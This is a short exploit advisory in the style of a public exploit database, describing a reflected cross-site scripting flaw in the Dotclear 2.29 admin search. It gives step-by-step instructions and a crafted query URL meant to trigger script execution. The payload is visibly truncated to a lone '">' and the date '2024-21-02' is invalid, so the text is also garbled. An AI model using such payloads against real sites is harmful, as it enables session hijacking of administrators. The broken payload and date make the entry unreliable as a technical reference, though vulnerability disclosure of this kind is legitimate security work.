# Exploit Title: Dotclear Version : 2.29 - Reflected XSS # Date: 2024-21-02 # Exploit Author: tmrswrr # Vendor Homepage: https://dotclear.org/ # Version : 2.29 # Tested on: https://softaculous.com/demos/dotclear 1 ) Enter admin panel after write search button this payload : "> 2 ) https://127.0.0.1/Dotclear/admin/index.php?qx=">&process=Search 3 ) You will be see alert button